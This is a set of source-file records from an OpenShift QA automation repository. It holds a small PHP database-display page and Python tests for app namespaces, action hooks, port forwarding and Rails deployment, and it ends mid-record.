"content_id": "1305bd1e2abd4e51854036977459ee3d609d4a88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 501, "license_type": "no_license", "max_line_length": 332, "num_lines": 11, "path": "/automation/open/testmodules/RT/cartridge/app_template/postgresql/php/show.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\nheader('Content-Type: text/plain');\n$db = pg_connect(\"dbname=\".$_ENV[\"OPENSHIFT_APP_NAME\"].\" \".\"user=\".$_ENV[\"OPENSHIFT_POSTGRESQL_DB_USERNAME\"].\" \".\"password=\".$_ENV[\"OPENSHIFT_POSTGRESQL_DB_PASSWORD\"].\" \".\"host=\".$_ENV[\"OPENSHIFT_POSTGRESQL_DB_HOST\"].\" \".\"port=\".$_ENV[\"OPENSHIFT_POSTGRESQL_DB_PORT\"]) or die('Could not connect to the database: ' + pg_last_error());\n\n$result=pg_query(\"SELECT data FROM info;\");\n\nwhile( $row = pg_fetch_array($result) ) {\n echo $row[0];\n}\npg_close($db);\n?>\n" }, { "alpha_fraction": 0.5407407283782959, "alphanum_fraction": 0.5448148250579834, "avg_line_length": 31.14285659790039, "blob_id": "ef05a04036098f83f3e5570a8b5c36ff82684077", "content_id": "397532c24d9f13012dd548c1a2d1eaa2a30a2e9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2700, "license_type": "no_license", "max_line_length": 118, "num_lines": 84, "path": "/automation/open/testmodules/RT/client/alter_namespace.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport common\nimport OSConf\nimport rhtest\nimport random\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n valid_variants = [\"jbossas\", \"jbosseap\", \"php\", \"ruby\", \"ruby-1.9\", \"python\", \"wsgi\", \"perl\", \"diy\", \"nodejs\"]\n random.seed()\n rand = int(random.random() * len(valid_variants))\n self.app_type = common.app_types[valid_variants[rand]]\n\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.domain_name = common.get_domain_name(self.user_email, self.user_passwd)\n self.new_domain_name = common.getRandomString(10)\n self.app_name = \"testapp%s\"%(common.getRandomString(4))\n common.env_setup()\n\n def finalize(self):\n common.alter_domain(self.domain_name, self.user_email, self.user_passwd)\n\n\nclass AlterNamespace(OpenShiftTest):\n def test_method(self):\n\n self.info(\"Alter namespace test.\")\n\n self.add_step(\"Create app\",\n common.create_app,\n function_parameters=[self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd, \n False],\n expect_return=0)\n\n self.add_step(\"Change domain namespace to new one\",\n common.alter_domain,\n function_parameters=[self.new_domain_name, self.user_email, self.user_passwd],\n expect_return=0)\n\n self.add_step(\"Get app url\",\n OSConf.get_app_url,\n function_parameters = [self.app_name])\n\n self.add_step(\"Get app git repo url\",\n OSConf.get_git_url,\n function_parameters = [self.app_name])\n\n self.add_step(\"Check new app url is available\",\n common.grep_web_page,\n function_parameters = [\"__OUTPUT__[3]\", \"Welcome to OpenShift\"],\n expect_return=0)\n\n self.add_step(\"Check new app git repo is available\",\n \"git clone __OUTPUT__[4]\",\n expect_return=0)\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AlterNamespace)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5050569772720337, "alphanum_fraction": 0.5109460949897766, "avg_line_length": 36.54807662963867, "blob_id": "1cb3f6d1374ae3e856cda75f69d089454d42b1b1", "content_id": "775655918a6a3d6b5abefb7ecbd469b46f01047a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7811, "license_type": "no_license", "max_line_length": 108, "num_lines": 208, "path": "/automation/open/testmodules/RT/cartridge/PostStartScript.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: PostStartScript.py\n# Date: 2012/07/26 11:03\n# Author: [email protected]\n#\n\nimport common\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = [\"DEV\"]\n\n def initialize(self):\n self.info(\"[US2008][RT] Check running post-start script\")\n self.timeout = 95\n\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = 'php'\n\n try:\n self.cart_variant = self.config.tcms_arguments['cartridge']\n except:\n self.cart_variant = 'mysql'\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.info(\"DB VARIANT: %s\"%self.cart_variant)\n\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = common.getRandomString(10)\n self.custom_app_commands= \"#!/bin/sh\\n\\nid; echo TESTING_STRING_%s; \"%(\n self.test_variant)\n self.custom_cart_commands= \"#!/bin/sh\\n\\nid; echo TESTING_STRING_%s; \"%(\n self.cart_variant)\n self.hook_app_file = \"%s/.openshift/action_hooks/post_start_%s\"%(\n self.app_name, common.app_types[self.test_variant])\n self.hook_cart_file = \"%s/.openshift/action_hooks/post_start_%s\"%(\n self.app_name, common.cartridge_types[self.cart_variant])\n\n common.env_setup()\n\n\n def finalize(self):\n #just for the case if something interrupts restarting...\n common.run_remote_cmd_as_root(\"/sbin/service libra start\")\n\n\nclass PostStartScript(OpenShiftTest):\n def test_method(self):\n\n self.add_step(\"Create an app\", \n common.create_app,\n function_parameters=[self.app_name,\n common.app_types[self.test_variant],\n self.user_email, \n self.user_passwd, \n True],\n expect_return = 0)\n self.add_step(\"Embed a cartridge\", \n common.embed,\n function_parameters=[self.app_name,\n \"add-%s\"%common.cartridge_types[self.cart_variant], \n self.user_email, \n self.user_passwd],\n expect_return = 0)\n\n self.add_step(\"Add post-start script for %s\"%self.test_variant,\n \"echo '%s' > %s\"%\n (self.custom_app_commands, self.hook_app_file),\n expect_return = 0)\n\n self.add_step(\"Chmod +x for our scripts\",\n \"chmod +x %s/.openshift/action_hooks/post_start_*\"%\n (self.app_name),\n expect_return = 0)\n\n #for app only\n self.add_step(\"Git add/commit/push [App+Cartridge]\",\n \"cd %s && git add . && git commit -m new_files -a && git push\"%\n (self.app_name),\n expect_description = \"Only app hook should be executed\",\n expect_str = [\"remote: uid=\", \n \"remote: TESTING_STRING_%s\"%self.test_variant, \n \"remote: Done\"],\n unexpect_str = [\n \"remote: uid=0\"], #must not be root\n expect_return = 0)\n\n #add cartridge hook\n self.add_step(\"Add post-start script for %s\"%self.cart_variant,\n \"echo '%s'> %s\"%\n (self.custom_cart_commands, self.hook_cart_file),\n expect_return = 0)\n\n self.add_step(\"Chmod +x for our scripts\",\n \"chmod +x %s/.openshift/action_hooks/post_start_*\"%\n (self.app_name),\n expect_return = 0)\n\n #for both of them...\n self.add_step(\"Git add/commit/push [BOTH]\",\n \"cd %s && git add . && git commit -m update_hooks -a && git push\"%\n (self.app_name),\n expect_description = \"Both hooks should be executed\",\n expect_str = [\"remote: uid=\", \n \"remote: TESTING_STRING_%s\"%self.test_variant, \n \"remote: TESTING_STRING_%s\"%self.cart_variant, \n \"remote: Done\"],\n unexpect_str = [\n \"remote: uid=0\"], #must not be root\n expect_return = 0)\n\n self.add_step(\"Check the app url\",\n common.check_web_page_output,\n function_parameters=[self.app_name],\n try_count=3,\n expect_return = 0)\n\n #only for CART, no PHP\n self.add_step(\"Remove PHP post-start script\",\n \"cd %s && git rm -f %s \"%(self.app_name, self.hook_app_file.replace(self.app_name,\".\")),\n expect_return = 0)\n\n self.add_step(\"Git add/commit/push\",\n \"cd %s && git add . && git commit -m update_hooks -a && git push\"%\n (self.app_name),\n expect_description = \"Only cartridge hook should be executed\",\n expect_str = [\"remote: uid=\", \n \"remote: TESTING_STRING_%s\"%self.cart_variant, \n \"remote: Done\"],\n unexpect_str = [\n \"remote: uid=0\", #must not be root\n \"remote: TESTING_STRING_%s\"%self.test_variant], \n expect_return = 0)\n\n self.add_step(\"Check the app url\",\n common.check_web_page_output,\n function_parameters=[self.app_name],\n try_count=3,\n expect_return = 0)\n #\n #check the timeout\n #\n self.custom_app_commands += \"sleep %s\"%(self.timeout)\n self.custom_cart_commands += \"sleep %s\"%(self.timeout)\n self.add_step(\"Add post-start script for %s\"%self.test_variant,\n \"echo '%s' > %s\"%\n (self.custom_app_commands, self.hook_app_file),\n expect_return = 0)\n\n self.add_step(\"Add post-start script for %s\"%self.cart_variant,\n \"echo '%s'> %s\"%\n (self.custom_cart_commands, self.hook_cart_file),\n expect_return = 0)\n\n self.add_step(\"Chmod +x for our scripts\",\n \"chmod +x %s/.openshift/action_hooks/post_start_*\"%\n (self.app_name),\n expect_return = 0)\n\n self.add_step(\"Git add/commit/push [TIMEOUT+BOTH]\",\n \"cd %s && git add . && git commit -m update_hooks -a && git push\"%\n (self.app_name),\n expect_description = \"Both hooks should be executed\",\n expect_str = [\"remote: uid=\", \n \"remote: TESTING_STRING_%s\"%self.test_variant, \n \"remote: TESTING_STRING_%s\"%self.cart_variant, \n \"remote: Done\"],\n unexpect_str = [\"remote: uid=0\"], #must not be root\n expect_return = 0)\n\n\n self.add_step(\"Check the output remotely\",\n common.run_remote_cmd_as_root,\n expect_description = \"`Timeout' warning message should be present in the output of libra start\",\n function_parameters = [\"/sbin/service libra restart | grep Timeout\"],\n expect_return = 0)\n\n self.add_step(\"Check the app url\",\n common.check_web_page_output,\n function_parameters=[self.app_name],\n expect_return = 0)\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PostStartScript)\n return suite\n\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of PostStartScript.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6177945137023926, "alphanum_fraction": 0.6328321099281311, "avg_line_length": 16.733333587646484, "blob_id": "b7594813b02b7506d4151fb98a428174fe0f6c4e", "content_id": "04e5853f466da7a9ab1d66550f862ccbe5aa250a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 798, "license_type": "no_license", "max_line_length": 54, "num_lines": 45, "path": "/automation/open/testmodules/BI/Demo01.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\n\"\"\"\nimport rhtest\nimport database\nimport time\n\nimport random\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n ITEST = \"Titan\"\n\n def initialize(self):\n #tb = self.config.testbed\n pass\n\n def finalize(self):\n pass\n\n\nclass Demo01(OpenShiftTest):\n def test_method(self):\n errorCount = ((random.randint(1, 8) % 8) == 0)\n\n if errorCount:\n return self.failed(\"Demo01 test failed.\")\n else:\n return self.passed(\"Demo01 test passed.\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Demo01)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6037099361419678, "alphanum_fraction": 0.6286677718162537, "avg_line_length": 30.53191566467285, "blob_id": "e56a3f675b7b793b5134a3135ed05d496d70e1c2", "content_id": "6715a2db0808d054417b14dd963e0a6a7985a9fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2965, "license_type": "no_license", "max_line_length": 211, "num_lines": 94, "path": "/automation/open/testmodules/UI/web/case_180951.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_180951.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass AddAllCartridgeTospringeap(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n\n #create a jbosseap app\n #web.create_app(\"springeap6\",\"springeap\")\n web.go_to_create_app(\"springeap6\")\n web.input_by_id(\"application_name\", \"springeap\")\n web.click_element_by_id(\"application_submit\")\n time.sleep(40)\n web.assert_text_equal_by_xpath('''Your application has been created. If you're new to OpenShift check out these tips for where to go next.''', '''//div[@id='content']/div/div/div/div[2]/div/section/p''')\n\n \n #go to app springeap page and add cartridges\n web.add_cartridge(\"springeap\", \"mongodb-2.2\")\n time.sleep(8)\n web.assert_text_equal_by_xpath(\"rhc app cartridge remove -a springeap -c mongodb-2.2\",'''//pre[3]''') \n\n web.add_cartridge(\"springeap\", \"cron-1.4\")\n web.assert_text_equal_by_xpath(\"Cron 1.4\",'''//div[@id='cartridge_type_']/h3''')\n\n web.add_cartridge(\"springeap\", \"mysql-5.1\")\n web.assert_text_equal_by_xpath(\"rhc app cartridge remove -a springeap -c mysql-5.1\",'''//pre[3]''') \n\n web.add_cartridge(\"springeap\",\"metrics-0.1\")\n web.assert_text_equal_by_xpath(\"OpenShift Metrics 0.1\",'''//div[@id='cartridge_type_']/h3''')\n\n web.add_cartridge(\"springeap\",\"phpmyadmin-3.4\")\n web.assert_text_equal_by_xpath(\"phpMyAdmin 3.4\",'''//div[@id='cartridge_type_']/h3''')\n\n web.add_cartridge(\"springeap\",\"rockmongo-1.1\")\n web.assert_text_equal_by_xpath(\"rhc app cartridge remove -a springeap -c rockmongo-1.1\",'''//pre[3]''') \n\n web.go_to_app_detail(\"springeap\")\n web.click_element_by_xpath('''//a[contains(@href, '/building')]''')\n web.input_by_id(\"application_name\", \"jenkins\")\n web.click_element_by_id(\"application_submit\")\n time.sleep(150) \n web.assert_text_equal_by_xpath(\"Building your Application\",'''//div[@id='content']/div/div/div/div[2]/div/h1''')\n\n\n #delete a springeap app\n web.delete_app(\"springeap\")\n #delete a jenkins app\n web.delete_last_app(\"jenkins\")\n\n\n self.tearDown()\n\n return self.passed(\" case_180951--AddAllCartridgeTospringeap passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AddAllCartridgeTospringeap)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_180951.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5599119663238525, "alphanum_fraction": 0.5645245909690857, "avg_line_length": 48.68229293823242, "blob_id": "49fc5dc58d7048495272a418779fc212c75590d2", "content_id": "2383ebf6cf5838e3ff6bb0c2b864fe246721581d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9539, "license_type": "no_license", "max_line_length": 251, "num_lines": 192, "path": "/automation/open/testmodules/RT/client/rhc_port_forward.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport common\nimport OSConf\nimport rhtest\nimport time\nimport re\nimport proc\nimport signal\nimport pexpect\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.app_name = common.getRandomString(10)\n try:\n self.app_type = self.get_variant()\n except:\n self.app_type = \"php\"\n #self.app_type = \"jbossas\"\n\n self.databases = {\n 'postgresql': {'check':'psql --version',\n 'cmd': 'echo \"*:PORT:DATABASE:USERNAME:PASSWORD\">$HOME/.pgpass;chmod 0600 $HOME/.pgpass;echo \"\\d\" | psql -w -h HOSTNAME --port PORT -U USERNAME DATABASE'},\n 'mongodb': {'check':'mongo --version',\n 'cmd': 'echo \"\" | mongo HOSTNAME:PORT/DATABASE -u USERNAME -p PASSWORD'},\n 'mysql': {'check':'mysql --version',\n 'cmd': 'echo \"SHOW TABLES;\" | mysql -h HOSTNAME -P PORT -u USERNAME -pPASSWORD DATABASE'}}\n\n self.info(\"Supported DB engines: %s\"%self.databases.keys())\n try:\n self.db_variant = self.config.tcms_arguments['db_cartridge']\n except:\n self.db_variant = 'mysql'\n self.info(\"Not defined 'db_cartridge' in TCMS arguments, using `%s` as default.\" % (self.db_variant))\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n if self.scalable:\n self.scalable = True\n\n if not self.databases.has_key(self.db_variant):\n raise rhtest.TestIncompleteError(\"Unsupported db cartridge. Use: %s\" % self.databases.keys())\n print \"-\"*80\n self.info(\"Variant: %s\"%self.app_type)\n self.info(\"DB Cartridge variant: %s\"%self.db_variant)\n self.info(\"SCALABLE : %s\"%self.scalable)\n print \"-\"*80\n cmd = self.databases[self.db_variant]['check'] #check for dependencies\n if (common.command_get_status(cmd) != 0):\n raise rhtest.TestIncompleteError(\"The '%s' client program is missing needed for accessing remote server. Install particular RPM in order to proceed with this testcase.\"%cmd)\n common.env_setup()\n\nclass RhcPortForward(OpenShiftTest):\n def test_port_forward(self, new_syntax=True):\n self.services = []\n result = True\n db_info = OSConf.get_embed_info(self.app_name, common.cartridge_types[self.db_variant])\n self.info(\"db_cartridge info: %s\"%db_info)\n if new_syntax:\n cmd = \"rhc port-forward %s -l %s -p '%s' %s\" % (self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS)\n else:\n cmd = \"rhc port-forward -a %s -l %s -p '%s' %s\" % (self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS)\n self.debug(\"Command: %s\" % (cmd))\n proc = pexpect.spawn(cmd)\n # expand the timeout from 20 to 40 to avoid slow response\n proc.expect('--', timeout=40)\n line = proc.readline()\n while 'terminate' not in line:\n line = proc.readline()\n self.info(line)\n #match = re.search(r'(\\w+)\\s+[\\d.:]+\\s+=>\\s+((\\d+\\.){3}\\d+):(\\d+)', line)\n #match = re.search(r'(\\w+)\\s+((\\d+\\.){3}\\d+):(\\d+)+\\s+=>\\s+[\\w\\.\\:\\-\\d]+', line)\n match = re.search(r'(\\w+)\\s+((\\d+\\.){3}\\d+):(\\d+)+\\s+=>[\\w\\s\\.\\:]*', line)\n self.info(line)\n print match\n if match:\n serv = match.group(1)\n host = match.group(2)\n port = match.group(4)\n print serv\n self.services.append(serv)\n ret = self.check_port(serv, host, port)\n if ret != 0:\n result = False\n self.debug(\"Check failed: %s %s:%s\" % (serv, host, port))\n #line = proc.readline()\n self.info(self.services)\n proc.terminate()\n return result\n\n def check_port(self, serv, host, port):\n self.info(\"Checking service %s at %s:%s\" % (serv, host, port))\n if serv in ('haproxy'):\n return common.grep_web_page(\"%s:%s\" % (host, port), \"(openshift)|(Statistics Report)\")\n elif serv in ['mysqld', 'mysql']:\n db_info = OSConf.get_embed_info(self.app_name, common.cartridge_types['mysql'])\n cmd = \"echo 'show databases;' | mysql -h %s -P %s -u %s -p%s %s\" % (host, port, db_info['username'], db_info['password'], self.app_name)\n elif serv in ['postgres', 'postgresql']:\n db_info = OSConf.get_embed_info(self.app_name, common.cartridge_types['postgresql'])\n cmd = 'echo \"%s:%s:%s:%s:%s\" > $HOME/.pgpass ; chmod 0600 $HOME/.pgpass ; echo \"\\d\" | psql -w -h %s --port %s -U %s %s' % (host, port, self.app_name, db_info['username'], db_info['password'], host, port, db_info['username'], self.app_name)\n elif serv in ['mongod', 'mongodb']:\n db_info = OSConf.get_embed_info(self.app_name, common.cartridge_types['mongodb'])\n cmd = 'echo \"show collections;\" | mongo -u %s -p %s %s:%s/%s' % (db_info['username'], db_info['password'], host, port, self.app_name)\n elif port == '8080':\n return common.grep_web_page(\"%s:%s\" % (host, port), \"(openshift)|(Statistics Report)\")\n else:\n self.info(\"No check for service: %s %s:%s\" % (serv, host, port))\n return 0\n return common.command_get_status(cmd)\n\n def test_method(self):\n self.info(\"[US1491][rhc-client] Run 'rhc port-forward' with various arguments\")\n self.debug(\"1. Create an app\")\n status = common.create_app(self.app_name,\n common.app_types[self.app_type],\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n False, \"./\", self.scalable)\n self.assert_equal(status, 0, \"%s application should be created.\"%self.app_type)\n\n if self.scalable:\n self.info(\"Embed all the database cartridges to the scalable app\")\n ret = common.embed(self.app_name,\n 'add-%s'%common.cartridge_types['mysql'],\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Embeding of mysql should pass.\")\n\n ret = common.embed(self.app_name,\n 'add-%s'%common.cartridge_types['postgresql'],\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Embeding of postgresql should pass.\")\n\n #ret = common.embed(self.app_name,\n # 'add-%s'%common.cartridge_types['mongodb'],\n # self.config.OPENSHIFT_user_email,\n # self.config.OPENSHIFT_user_passwd)\n #self.assert_equal(ret, 0, \"Embeding of mongodb should pass.\")\n\n ret = common.scale_up(self.app_name)\n self.assert_equal(ret, 0, \"The app should be scaled up\")\n else:\n self.info(\"Embed %s to the app\" % (self.db_variant))\n ret = common.embed(self.app_name,\n 'add-%s'%common.cartridge_types[self.db_variant],\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Embeding of %s should pass.\"%self.db_variant)\n\n ret = self.test_port_forward(True)\n self.assert_equal(ret, True, \"Failed to forward ports(new rhc syntax)\")\n ret = self.test_port_forward(False)\n self.assert_equal(ret, True, \"Failed to forward ports(old rhc syntax)\")\n if self.scalable:\n #self.assert_true(('mysql' in self.services), \"mysql ports of scalable apps should be forwarded\")\n #self.assert_true(('postgresql' in self.services), \"postgresql ports of scalable apps should be forwarded\")\n #self.assert_true(('mongodb' in self.services), \"mongo ports of scalable apps should be forwarded\")\n self.assert_true(('mysql' in self.services) or ('mysqld' in self.services), \"mysql ports of scalable apps should be forwarded\")\n self.assert_true(('postgresql' in self.services) or ('postgres' in self.services), \"postgresql ports of scalable apps should be forwarded\")\n #self.assert_true(('mongodb' in self.services) or ('mongod' in self.services), \"mongo ports of scalable apps should be forwarded\")\n\n else:\n if self.db_variant == 'mysql':\n db_service = 'mysqld'\n elif self.db_variant == 'postgresql':\n db_service = 'postgres'\n elif self.db_variant == 'mongodb':\n db_service = 'mongod'\n else:\n self.info(\"Invalid database\")\n self.assert_true((db_service in self.services) or (self.db_variant in self.services), \"%s ports haven't been forwarded\" % (self.db_variant))\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcPortForward)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5896048545837402, "alphanum_fraction": 0.6019019484519958, "avg_line_length": 37.84713363647461, "blob_id": "67509868cb0bbec79b11e446b670f1ec6ceea3df", "content_id": "281b751ae93d9a0945f05b96f742b73345773c2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6099, "license_type": "no_license", "max_line_length": 186, "num_lines": 157, "path": "/automation/open/testmodules/RT/cartridge/ruby_rails_framework_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\n2012-08-15\n\n[rhc-cartridge]Ruby / Rails Framework Support ruby-1.8\n[US2123]ruby-1.9 / Rails3.2 Framework Support\nhttps://tcms.engineering.redhat.com/case/167902/\n\"\"\"\nimport os\nimport common\nimport OSConf\nimport rhtest\nimport time\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False # define to True if your test is interactive (takes user input).\n ITEST = ['DEV', 'INT', 'STG'] #this will be checked by framework\n WORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"WARN: Missing variant, used `ruby` as default\")\n self.test_variant = 'ruby'\n try:\n self.rails_ver = self.config.tcms_arguments['rails']\n except:\n self.rails_ver = \"3.0.16\"\n self.summary = \"[rhc-cartridge]Ruby / Rails Framework Support ruby-1.8\\n[US2123]ruby-1.9 / Rails3.2 Framework Support\"\n if \"1.9\" in self.test_variant:\n self.app_name = \"ruby19rails\" + common.getRandomString(4)\n else:\n self.app_name = \"ruby18rails\" + common.getRandomString(4)\n self.app_type = common.app_types[self.test_variant]\n self.git_repo = \"./%s\" % (self.app_name)\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass RubyRailsFrameworkTest(OpenShiftTest):\n\n def setup(self):\n cmd = \"rails -v\"\n (ret, output) = common.command_getstatusoutput(cmd, True)\n if ret == 0 and \"Rails %s\" % (self.rails_ver) in output:\n return 0\n else:\n cmd = \"sudo gem uninstall railties actionpack actionmailer activemodel activeresource activerecord activesupport rails -axI ; sudo gem install -v %s rails\" % (self.rails_ver)\n (ret, output) = common.command_getstatusoutput(cmd, False)\n return ret\n\n def test_method(self):\n self.step(\"Setup rails environment\")\n ret = self.setup()\n self.assert_equal(ret, 0, \"Failed to setup rails %s environment\" % (self.rails_ver))\n\n time.sleep(5)\n\n self.step(\"Create %s app: %s\" % (self.app_type, self.app_name))\n ret = common.create_app(self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True, \"./\", self.scalable)\n self.assert_equal(ret, 0, \"Failed to create %s app: %s\" % (self.app_type, self.app_name))\n\n self.step(\"Create new rails application\")\n ret = common.command_get_status(\"rails new %s -f\" % (self.git_repo))\n self.assert_equal(ret, 0, \"Failed to create rails app\")\n\n if \"3.2\" in self.rails_ver:\n self.step(\"Add execjs and therubyracer for rails-3.2 application\")\n try:\n f = file(\"%s/Gemfile\" % (self.git_repo), \"a\")\n f.writelines([\"gem 'execjs'\\n\", \"gem 'therubyracer'\\n\"])\n f.close()\n except IOError, e:\n raise TestFailError, e\n except:\n raise TestFailError, \"Unkown exception. Failed to modify Gemfile\"\n\n self.step(\"Generate rails controller\")\n ret = common.command_get_status(\"cd %s && bundle install && rails generate controller home index\" % (self.git_repo, ))\n self.assert_equal(ret, 0, \"Failed to generate rails controller\")\n\n self.step(\"Create home page\")\n test_html = common.getRandomString()\n try:\n f = file(\"%s/app/views/home/index.html.erb\" % (self.git_repo), \"w\")\n f.write(test_html)\n f.close()\n except IOError, e:\n raise TestFailError, e\n except:\n raise TestFailError, \"Unkown exception. Failed to modify app/views/home/index.html.erb\"\n\n self.step(\"Remove public/index.html\")\n try:\n os.remove(\"%s/public/index.html\" % (self.git_repo))\n except OSError, e:\n raise TestFailError, e\n\n self.step(\"Add controller to config/routes.rb\")\n cmd = \"\"\"sed -i -e '3 i\\\\\\n root :to => \"home#index\"' %s/config/routes.rb\"\"\" % (self.git_repo)\n ret = common.command_get_status(cmd)\n self.assert_equal(ret, 0, \"Failed to modify config/routes.rb\")\n\n if \"3.2\" in self.rails_ver:\n cmd = \"sed -i -E 's/config.assets.compile = false/config.assets.compile = true/g' %s/config/environments/production.rb\" % (self.git_repo)\n ret = common.command_get_status(cmd)\n self.assert_equal(ret, 0, \"Failed to modify config/environments/production.rb\")\n\n self.step(\"Check hardware platform\")\n (ret, output) = common.command_getstatusoutput(\"uname -i\")\n self.assert_equal(ret, 0, \"Failed to get hardware platform\")\n self.hardware_platform = output.strip()\n\n if self.hardware_platform in (\"i386\", \"i686\"):\n self.step(\"Add sqlite3 libraries to .gitignore\")\n try:\n f = file(\"%s/.gitignore\" % (self.git_repo), \"a\")\n f.write(\"vendor/bundle/ruby/1.8/gems/sqlite3-*\\n\")\n f.close()\n except IOError:\n raise TestFailError, e\n except:\n raise TestFailError, \"Unkown exception. Failed to modify .gitignore\"\n\n self.step(\"Git push all the changes\")\n ret = common.command_get_status(\"cd %s && git add . && git commit -amt && git push\" % (self.git_repo))\n self.assert_equal(ret, 0, \"Git push failed\")\n\n self.step(\"Check web page via brower\")\n self.app_url = OSConf.get_app_url(self.app_name)\n ret = common.grep_web_page(self.app_url, test_html)\n self.assert_equal(ret, 0, \"Rails app isn't deployed successfully\")\n\n return self.passed()\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RubyRailsFrameworkTest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 24.5, "blob_id": "35de192307e7901fd8b1b139e3d6366b513d0e3c", "content_id": "8ddcfc66a8e5e6320fcb849a9f26b76734fdf757", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 51, "license_type": "no_license", "max_line_length": 34, "num_lines": 2, "path": "/automation/parallel/atest/funnylib.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "def this_keyword_is_in_funnylib():\n print 'jee'\n" }, { "alpha_fraction": 0.5110043883323669, "alphanum_fraction": 0.523809552192688, "avg_line_length": 29.845678329467773, "blob_id": "89619d119ea51909ade8894a3796aa6500df2f38", "content_id": "c4379118ca7fe75c0d04c303e6eb889aff1619ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 